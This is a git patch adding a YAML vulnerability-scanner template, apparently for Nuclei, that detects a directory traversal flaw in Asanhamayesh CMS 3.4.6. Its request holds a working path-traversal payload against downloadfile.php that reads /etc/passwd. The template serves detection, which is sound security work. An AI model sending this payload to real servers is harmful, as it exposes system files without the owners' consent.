From d4e38b00e3c298287e641463a0e22b6cd952100c Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Thu, 16 Dec 2021 21:56:43 +0900
Subject: [PATCH] Create asanhamayesh-cms-lfi.yaml

---
 asanhamayesh-cms-lfi.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 asanhamayesh-cms-lfi.yaml

diff --git a/asanhamayesh-cms-lfi.yaml b/asanhamayesh-cms-lfi.yaml
new file mode 100644
index 0000000000..18961552cf
--- /dev/null
+++ b/asanhamayesh-cms-lfi.yaml
@@ -0,0 +1,24 @@
+id: asanhamayesh-cms-lfi
+
+info:
+  name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability
+  author: 0x_Akoko
+  severity: high
+  reference: https://cxsecurity.com/issue/WLB-2018030006
+  tags: asanhamayesh,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200